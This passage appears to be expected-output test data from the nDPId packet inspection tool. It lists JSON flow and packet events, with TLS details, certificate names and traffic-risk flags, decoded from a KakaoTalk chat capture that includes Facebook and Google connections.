HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01039{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":161,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031236,"flow_last_seen":1430069031391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1850,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1430069031391,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -01829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069031236,"flow_last_seen":1430069031408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4141,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069031408,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7440000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"thread_ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1430069031611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":113,"pkt_l4_len":77,"thread_ts_msec":1430069031611,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGHTnUAAQAbVXgoYUrw2\/\/3H5i8UZ+uf0VkGiXPCgBgCYxkQAAABAQgKAAKTKDTnT0kXAwEAKNOo\/lFrrxEtj1oyrBEybZXAvF7754xqLjvuYfV0gCpDpumAA3\/lW60="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035398,"flow_last_seen":1430069035398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069035398,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1430069035398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChV8UAAQAbFkwoYUrzSZ\/APpVwBu+YrTKNirTiWUBFpAB9mAAA="} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1430069035537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035537,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkaUAAjgapG9Jn8A8KGFK8AbulXGKtOJbmK0ykUBCkj3bOAAA="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035840,"flow_last_seen":1430069035840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1430069035840,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035840,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADytk0AAPwbN8woYUrwfDURUkrUAUM0qoIsAAAAAoAI5CEEgAAACBAV4BAIICgALDRgAAAAAAQMDBw=="} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1430069035877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069035877,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxm7kAA+AZbqB8NRFQKGFK8AFCStWTibgPNKqCMYBIRHPNeAAACBAV4"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1430069035880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035880,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACitlEAAPwbOBgoYUrwfDURUkrUAUM0qoIxk4m4EUBA5COLzAAA="} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035840,"flow_last_seen":1430069035921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069035921,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035967,"flow_last_seen":1430069035967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035967,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1430069035967,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035967,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzw1UAAPwaKsQoYUrwfDURUsJ0Bu3W4\/fMAAAAAoAI5CBvJAAACBAV4BAIICgALDSYAAAAAAQMDBw=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1430069036008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036008,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxGQkAA+AZ8VB8NRFQKGFK8AbuwnWIYU8F1uP30YBIRHOshAAACBAV4"} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1430069036010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036010,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjw1kAAPwaKxAoYUrwfDURUsJ0Bu3W4\/fRiGFPCUBA5CNq2AAA="} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069035967,"flow_last_seen":1430069036012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036012,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069036068,"flow_last_seen":1430069036068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069036068,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1430069036068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069036068,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwqSkAAPwalnwoYUryt\/GECircBu1PEJ3oAAAAAoAI5CI51AAACBAV4BAIICgALDTAAAAAAAQMDBw=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1430069036109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036109,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACzrl0AA+AYrYa38YQIKGFK8AbuKt2bo6WFTxCd7YBIRHMNnAAACBAV4"} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1430069036113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036113,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgqS0AAPwalsgoYUryt\/GECircBu1PEJ3tm6OliUBA5CLL8AAA="} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069036068,"flow_last_seen":1430069036116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036116,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069035967,"flow_last_seen":1430069036121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} -01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069035967,"flow_last_seen":1430069036179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069036179,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":258,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069036068,"flow_last_seen":1430069036608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036608,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} -01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1430069036068,"flow_last_seen":1430069036612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069036612,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., 
CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} -00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069044758,"flow_last_seen":1430069044758,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1430069044758,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00803{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1430069044758,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":303,"pkt_l4_len":267,"thread_ts_msec":1430069044758,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAR8KJUAAjgb4zIuWAH0KGFK8Abu3Y2Ij0KVRKAPiUBigLueuAADzAAAApDlIVrVdqRc+Gkt7POZ3i2OlkuY4MMfPTZY9G4U0YFfr\/Io7pOCQe3JDBNAmPdEpHGIlOOWztPzNgfmCZdfJbXa\/FjyLrCbe\/cKrmuhEYDyIPsoQcOHY3YFPdOkSmKChheXsyu06po9uQ1CWTJDZfqoByGUY9M3+\/torvsssHclmFyrgMhiQBPDR+\/p96Y\/\/sK6VRP8W+SfBO5i7Jg3brhWvS81m7IbytFR73ZERAlFn0QejuZzhem715ywfbXU8ySrwRBK2cs3ywClzqW\/s7h0teJNcn45XHRR+Z0ZTPA29+kHM57k5C1faf1I\/3jeLMDw\/"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1430069044836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069044836,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTekAAQAZ+bgoYUryLlgB9t2MBu1EoA+JiI9GcUBCIgOkBAAA="} 
-00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1430069044940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":98,"pkt_l4_len":62,"thread_ts_msec":1430069044940,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFLTe0AAQAZ+QwoYUryLlgB9t2MBu1EoA+JiI9GcUBiIgH9kAAAmAAAApDlIVrVdqRc+Gkt7POZ3i2OlX+Y4MArPTZYlBp4hfXC7UiHVW\/8="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1430069048642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069048642,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkakAAjgapGtJn8A8KGFK8AbulXNdU3uvmK0ykUBSkj1vNAAA="} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069049770,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1430069049770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069049770,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUZ0AAQAZSqgoYUrytwki8h34UbGWkOWcyCtXvgBgB12cmAAABAQgKAAKaQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069060011,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 